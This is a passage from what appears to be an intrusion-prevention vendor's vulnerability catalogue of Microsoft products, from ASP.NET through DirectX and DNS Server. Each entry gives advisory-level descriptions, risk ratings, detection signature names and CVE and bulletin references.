An elevation of privilege vulnerability exists in Microsoft's ASP.NET. The vulnerability is due to the way in which the security cookie is generated. A remote, unauthenticated attacker can exploit this vulnerability by registering a crafted account on an ASP.NET web application. Successful exploitation of this vulnerability would allow an attacker to impersonate a high privileged user of the affected ASP.NET web application, the attacker could then take any action in the context of the targeted user, possibly including executing arbitrary commands on the site.

Situation:

HTTP_CRL-Microsoft-ASP.NET-Forms-Authentication-Elevation-Of-Privilege

References:

CVE-2011-3416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3416

BID-51201
http://www.securityfocus.com/bid/51201

OSVDB-78055
http://www.osvdb.org/78055

MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100

Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-432-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There is an insecure redirect vulnerability in the Microsoft ASP.NET framework. The vulnerability is due to improper validation of the ReturnUrl in the Forms Authentication module. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to visit a URL. After authenticating to a vulnerable server, a target user would be redirected to an attacker-controlled URI. Successful exploitation could lead to spoofing and information disclosure.

Situation:

HTTP_CSU-Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect

References:

CVE-2011-3415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3415

BID-51202
http://www.securityfocus.com/bid/51202

OSVDB-78054
http://www.osvdb.org/78054

MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100

Microsoft-ASP.NET-Hash-Collision-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft ASP.NET

Risk:

High

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft ASP.NET

Type:

Malfunction

Description:

There is a vulnerability in Microsoft ASP.NET.

Situation:

HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request

References:

CVE-2011-3414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3414

MS11-100
http://technet.microsoft.com/security/bulletin/MS11-100

Microsoft-ASP.NET-Information-Disclosure-CVE-2010-3332

About this vulnerability:

An information disclosure vulnerability in Microsoft ASP.NET

Risk:

High

First detected in:

sgpkg-ips-342-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft ASP.NET.

References:

CVE-2010-3332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3332

BID-43316
http://www.securityfocus.com/bid/43316

MS10-070
http://technet.microsoft.com/security/bulletin/MS10-070

Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability

About this vulnerability:

Vulnerability in Microsoft .NET Framework

Risk:

Low

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

There is a a vulnerability in Microsoft .NET Framework was detected. ASP.NET component of .NET Framework may allow access to configuration files and other sensitive information when the URI is terminated with an extra null character.

Situation:

HTTP_CSU-Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability

References:

CVE-2007-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0042

MS07-040
http://technet.microsoft.com/security/bulletin/MS07-040

Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure

About this vulnerability:

A Microsoft ASP.NET PKCS Padding Information Disclosure vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft ASP.NET

Type:

Malfunction

Description:

A vulnerability in Microsoft ASP.NET which allows remote attackers to view and tamper with data on the target server due to the server providing web clients details in error messages when decrypting certain ciphertext.

Situation:

HTTP_CSU-Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure

References:

CVE-2010-3332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3332

Microsoft-ASP.NET-ViewState-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Microsoft ASP.NET

Risk:

Moderate

First detected in:

sgpkg-ips-180-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft ASP.NET

Type:

Malfunction

Description:

There is a denial of service vulnerability in Microsoft ASP.NET. An attacker can send an HTTP request with crafted VIEWSTATE data to consume a large amount of computing resources. A continuous attack may cause a denial of service condition.

Situation:

HTTP_CRL-Microsoft-ASP.NET-ViewState-Denial-Of-Service

References:

CVE-2005-1665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1665

OSVDB-16195
http://www.osvdb.org/16195

Microsoft-ATL-COM-Initialization

About this vulnerability:

A vulnerability in Microsoft Active Template Library

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Active Template Library.

Situation:

HTTP_SS-Microsoft-ATL-COM-Initialization
File-Binary_Microsoft-ATL-COM-Initialization

References:

CVE-2009-2493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2493

MS09-035
http://technet.microsoft.com/security/bulletin/MS09-035

Microsoft-ATL-Uninitialized-Object

About this vulnerability:

A vulnerability in Microsoft Active Template Library

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1729-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Active Template Library.

Situation:

HTTP_SS-Microsoft-ATL-Uninitialized-Object

References:

CVE-2009-0901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0901

BID-35832
http://www.securityfocus.com/bid/35832

MS09-035
http://technet.microsoft.com/security/bulletin/MS09-035

Microsoft-Authentication-Failure

About this vulnerability:	A failed Microsoft login attempt detected
Risk:	High
First detected in:	sgpkg-ips-1844-5242
Last changed:	sgpkg-ips-1844-5242
Platform:	Generic
Software:	Any Software
Type:	Brute Force
Description:	This detects failed login attempts against Microsoft accounts.
Situation:	File-Text_Microsoft-Authentication-Failure

Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass

About this vulnerability:

A vulnerability in Microsoft Azure Open Management Infrastructure

Risk:

Moderate

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Windows

Software:

Microsoft Azure Open Management Infrastructure

Type:

Malfunction

Description:

Improper validation of the Authorization header in HTTP requests causes an authentication bypass vulnerability in Microsoft Azure Open Management Infrastructure. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-TextId_Microsoft-Azure-Open-Management-Infrastructure-Authentication-Bypass

References:

CVE-2021-38647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38647

Microsoft-Browser-Memory-Corruption-CVE-2016-0105

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-741-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Browser-Memory-Corruption-CVE-2016-0105

References:

CVE-2016-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0105

MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023

Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge and Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-812-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Internet Explorer and Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion

References:

CVE-2016-3382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3382

MS16-118
http://technet.microsoft.com/security/bulletin/MS16-118

Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability

About this vulnerability:

Vulnerable ActiveX control allow access to the local system

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft BizTalk Server; Microsoft CAPICOM

Type:

Malfunction

Description:

There is a vulnerability in the Microsoft Cryptographic API Component Object Model (CAPICOM) Certificates ActiveX control included in Microsoft BizTalk Server. The vulnerability allows arbitrary code execution in the context of the current user.

Situation:

HTTP_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
File-Text_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability

References:

CVE-2007-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0940

BID-23782
http://www.securityfocus.com/bid/23782

OSVDB-34397
http://www.osvdb.org/34397

MS07-028
http://technet.microsoft.com/security/bulletin/MS07-028

Microsoft-CAPICOM-Utilities-ActiveX-Control-Integer-Overflow-Denial-Of-Service

About this vulnerability:	A vulnerability in Microsoft CAPICOM
Risk:	High
First detected in:	sgpkg-ips-587-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft CAPICOM
Type:	Malfunction
Description:	There is an integer overflow vulnerability in the 'GetRandom' function of Microsoft's CapiCom.Utilities ActiveX Control.
Situation:	File-Text_CAPICOM-Utilities-ActiveX-Control-Vulnerable-Function-Call

Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977

About this vulnerability:

A vulnerability in Microsoft Chart Control

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Chart Control

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_CSU-Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977

References:

CVE-2011-1977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1977

MS11-066
http://technet.microsoft.com/security/bulletin/MS11-066

Microsoft-Color-Management-Module-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of ICC profiles in Microsoft Color Management Module

Risk:

High

First detected in:

sgpkg-ips-64-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

The Microsoft Color Management Module suffers from a buffer overflow vulnerability, which allows arbitrary code execution when processing malicious ICC profiles. The vulnerability can be exploited by embedding ICC profiles into images and tricking victims into viewing the image with software that uses the Color Management Module. ICC profiles can be embedded in various image formats, including JPEG, TIFF and PNG, although ICC profiles are not necessarily exploitable in all image formats.

Situation:

HTTP_Suspicious-ICC-Profile-In-JPEG-File
E-Mail_BS-Suspicious-ICC-Profile-In-JPEG-File
File-JPEG_Microsoft-Windows-Suspicious-ICC-Profile-In-JPEG-File

References:

CVE-2005-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1219

BID-14214
http://www.securityfocus.com/bid/14214

MS05-036
http://technet.microsoft.com/security/bulletin/MS05-036

Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1413-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Color Management System.

Situation:

HTTP_SS-Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow

References:

CVE-2008-2245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2245

BID-30594
http://www.securityfocus.com/bid/30594

MS08-046
http://technet.microsoft.com/security/bulletin/MS08-046

Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468

About this vulnerability:

A vulnerability in Microsoft Configuration Manager

Risk:

Critical

First detected in:

sgpkg-ips-1829-5242

Last changed:

sgpkg-ips-1829-5242

Platform:

Windows

Software:

Microsoft Configuration Manager

Type:

SQL Injection

Description:

A SQL injection vulnerability exists in Microsoft Configuration Manager. An unauthenticated attacker can use this vulnerability to execute arbitrary code.

Situation:

HTTP_CS-Microsoft-Configuration-Manager-SQL-Injection-CVE-2024-43468

References:

CVE-2024-43468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43468

ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct

Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975

About this vulnerability:

A vulnerability in Microsoft Data Access Components

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Data Access Components

Type:

Malfunction

Description:

A vulnerability in Microsoft Data Access Components

Situation:

HTTP_CSU-Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
SMB-TCP_CHS_Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975

References:

CVE-2011-1975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1975

MS11-059
http://technet.microsoft.com/security/bulletin/MS11-059

Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252

About this vulnerability:

A code execution vulnerability in the Microsoft Data Analyzer ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-282-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a remote code execution vulnerability in the Microsoft Data Analyzer ActiveX Control.

Situation:

HTTP_SS-Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
File-Text_Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252

References:

CVE-2010-0252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0252

MS10-008
http://technet.microsoft.com/security/bulletin/MS10-008

Microsoft-Defender-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Defender detected

Risk:

High

First detected in:

sgpkg-ips-1402-5242

Last changed:

sgpkg-ips-1402-5242

Platform:

Windows

Software:

Microsoft Windows Defender

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Defender detected.

Situation:

File-Text_Microsoft-Defender-Remote-Code-Execution

References:

CVE-2021-42298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42298

Microsoft-Defender-Remote-Code-Execution-Vulnerability-CVE-2021-1647

About this vulnerability:

A vulnerability in Microsoft Windows Defender

Risk:

High

First detected in:

sgpkg-ips-1312-5242

Last changed:

sgpkg-ips-1312-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Microsoft Windows Defender. Copying an exploit file to a vulnerable system may result in remote code execution.

Situation:

File-Exe_Executable-Matching-Exploit-CVE-2021-1647-2
File-Exe_Executable-Matching-Exploit-CVE-2021-1647-1

References:

CVE-2021-1647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1647

ms21-jan
http://technet.microsoft.com/security/bulletin/ms21-jan

Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft DHCP service detected

Risk:

High

First detected in:

sgpkg-ips-1577-5242

Last changed:

sgpkg-ips-1577-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

An out-of-bound write issue has been identified in Microsoft's DHCP service. This vulnerability can be exploited to achieve remote code execution.

Situation:

Generic_UDP-Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231

References:

CVE-2023-28231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28231

ms23-apr
http://technet.microsoft.com/security/bulletin/ms23-apr

Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-242-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP2; Windows XP 64-bit SP2; Windows 2003

Software:

<os>

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Windows DHTML Editing ActiveX control.

Situation:

HTTP_SS-Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
File-Text_Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution

References:

CVE-2009-2519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2519

BID-36280
http://www.securityfocus.com/bid/36280

MS09-046
http://technet.microsoft.com/security/bulletin/MS09-046

Microsoft-Direct2d-SVG-Path-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-566-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft's Direct2D library. The vulnerability is due to the way the library handles certain 2D geometric figures. A remote attacker can exploit this vulnerability by enticing a user to download and process a file containing specially crafted 2D figures.

Situation:

File-TextId_Microsoft-Direct2d-SVG-Path-Memory-Corruption

References:

CVE-2014-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0263

MS14-007
http://technet.microsoft.com/security/bulletin/MS14-007

Microsoft-DirectPlay-Denial-Of-Service

About this vulnerability:

A vulnerability in DirectX

Risk:

High

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Input Validation

Description:

A denial of service vulnerability exists in the IDirectPlay4 application programming interface (API) of Microsoft DirectPlay, due to insufficient input validation of incoming network data. Any applications using this component of DirectX (typically network capable games) can fail if an attacker launches an attack against the application by sending malformed DirectPlay packets. The application has to be restarted to resume normal functionality.

Situation:

Generic_CS-Microsoft-DirectPlay-Denial-Of-Service
Generic_UDP-Microsoft-DirectPlay-Denial-Of-Service

References:

CVE-2004-0202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0202

BID-10487
http://www.securityfocus.com/bid/10487

OSVDB-6742
http://www.osvdb.org/6742

MS04-016
http://technet.microsoft.com/security/bulletin/MS04-016

Microsoft-DirectPlay-Heap-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft DirectPlay

Risk:

High

First detected in:

sgpkg-ips-497-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012

Software:

DirectX

Type:

Buffer Overflow

Description:

There is a heap overflow vulnerability in Microsoft DirectPlay.

Situation:

File-OLE_Microsoft-DirectPlay-Heap-Overflow-Vulnerability
File-Text_Microsoft-DirectPlay-Heap-Overflow-Vulnerability

References:

CVE-2012-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1537

MS12-082
http://technet.microsoft.com/security/bulletin/MS12-082

Microsoft-DirectShow-Audio-Decoder-Stack-Overflow

About this vulnerability:

A vulnerability in Microsoft DirectShow

Risk:

High

First detected in:

sgpkg-ips-300-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft DirectShow.

Situation:

HTTP_SS-Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
File-RIFF_Microsoft-DirectShow-Audio-Decoder-Stack-Overflow

References:

CVE-2010-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0480

MS10-026
http://technet.microsoft.com/security/bulletin/MS10-026

Microsoft-DirectShow-Heap-Overflow

About this vulnerability:

A vulnerability in Microsoft DirectShow

Risk:

High

First detected in:

sgpkg-ips-283-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft DirectShow.

Situation:

HTTP_SS-Microsoft-DirectShow-Heap-Overflow
File-RIFF_Microsoft-DirectShow-Heap-Overflow

References:

CVE-2010-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0250

BID-38112
http://www.securityfocus.com/bid/38112

MS10-013
http://technet.microsoft.com/security/bulletin/MS10-013

Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft DirectShow MPEG Layer-3 Audio Decoder. The vulnerability is due to memory corruption while decoding specially crafted media files. An attacker can exploit this vulnerability by enticing a user to process a malicious audio file. This can lead to memory corruption and the possibility of code execution in the context of the logged in user.

Situation:

File-Binary_Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption

References:

CVE-2010-1882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1882

MS10-052
http://technet.microsoft.com/security/bulletin/MS10-052

Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft DirectX

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft DirectShow QuickTime Movie Parser filter. A remote attacker can use this to execute code on the affected system.

Situation:

File-MPEG_Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption

References:

CVE-2009-1539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1539

MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028

Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft DirectX

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Malfunction

Description:

A memory corruption vulnerability exists in DirectShow technology in Microsoft DirectX.

Situation:

HTTP_SS-Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
File-MPEG_Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution

References:

CVE-2009-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537

BID-35139
http://www.securityfocus.com/bid/35139

OSVDB-54797
http://www.osvdb.org/54797

MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028

Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft DirectX

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft DirectShow QuickTime Movie Parser filter.

Situation:

File-MPEG_Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption

References:

CVE-2009-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1538

MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028

Microsoft-DirectShow-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft DirectShow

Risk:

High

First detected in:

sgpkg-ips-224-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

DirectX

Type:

Buffer Overflow

Description:

There is a vulnerability in the DirectShow component of Microsoft DirectX.

Situation:

HTTP_SS-Microsoft-DirectShow-Remote-Code-Execution
File-MPEG_Microsoft-DirectShow-Remote-Code-Execution

References:

CVE-2009-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537

BID-35139
http://www.securityfocus.com/bid/35139

OSVDB-54797
http://www.osvdb.org/54797

MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028

Microsoft-DirectX-Sami-File-Parsing-Code-Execution

About this vulnerability:

A buffer overflow vulnerability in Microsoft DirectX

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

DirectX

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted Synchronized Accessible Media Interchange (SAMI) files. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SAMI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-DirectX-Sami-File-Parsing-Code-Execution
File-TextId_Microsoft-DirectX-Sami-File-Parsing-Code-Execution

References:

CVE-2007-3901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3901

BID-26789
http://www.securityfocus.com/bid/26789

MS07-064
http://technet.microsoft.com/security/bulletin/MS07-064

Microsoft-DirectX-Sami-Format-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft DirectX

Risk:

High

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted Synchronized Accessible Media Interchange (SAMI) file type. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SAMI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
File-TextId_Microsoft-DirectX-Sami-Format-Parsing-Code-Execution

References:

CVE-2008-1444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1444

BID-29578
http://www.securityfocus.com/bid/29578

MS08-033
http://technet.microsoft.com/security/bulletin/MS08-033

Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft DirectX

Risk:

High

First detected in:

sgpkg-ips-134-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows Vista; Windows 2003

Software:

<os>

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted WAV and AVI files. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted WAV or AVI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.

Situation:

HTTP_SS-Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
File-RIFF_Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution

References:

CVE-2007-3895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3895

BID-26804
http://www.securityfocus.com/bid/26804

MS07-064
http://technet.microsoft.com/security/bulletin/MS07-064

Microsoft-DNS-Server-Any-Query-Cache-Weakness

About this vulnerability:

A Microsoft DNS Server ANY Query Cache Weakness vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Dns Spoof

Description:

A vulnerability in Microsoft DNS Server which allows remote attackers to have greater predictability of transaction IDs used by the DNS server, and thus facilitate DNS cache poisoning and redirection of Internet traffic, due to a response validation flaw where specifically crafted DNS responses are not correctly cached.

Situation:

DNS-UDP_Microsoft-DNS-Server-Any-Query-Cache-Weakness

References:

CVE-2009-0234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0234

Microsoft-DNS-Server-Denial-of-Service

About this vulnerability:

A Microsoft DNS Server Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A vulnerability in Microsoft DNS Server which allows remote attackers to cause a denial of service condition by sending crafted requests to a target DNS server due to the way in which DNS Resource Records are handled by the server.

Situation:

DNS-UDP_Microsoft-DNS-Server-Denial-of-Service
DNS-UDP_Microsoft-DNS-Server-Denial-of-Service-2

References:

CVE-2012-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0006

Microsoft-DNS-Server-WPAD-Registration-Spoofing

About this vulnerability:

A vulnerability in Microsoft Windows' DNS server

Risk:

Moderate

First detected in:

sgpkg-ips-212-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 Server; Windows 2003; Windows 2008

Software:

<os>

Type:

Insecure Configuration

Description:

There is a man-in-the-middle vulnerability in the DNS server shipped with various versions of Windows Server. The DNS server allows dynamic registration of the host name "wpad" in the domain. Successful exploitation may allow the attacker to redirect Internet traffic to an arbitrary host.

Situation:

DNS-UDP_Dynamic-DNS-WPAD-Host-Name-Registration

References:

CVE-2009-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0093

BID-33989
http://www.securityfocus.com/bid/33989

OSVDB-52519
http://www.osvdb.org/52519

MS09-008
http://technet.microsoft.com/security/bulletin/MS09-008

Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Dynamics AX detected

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Dynamics AX

Type:

Cross-site Scripting

Description:

There is an XSS vulnerability in Microsoft Dynamics AX Enterprise Portal.

Situation:

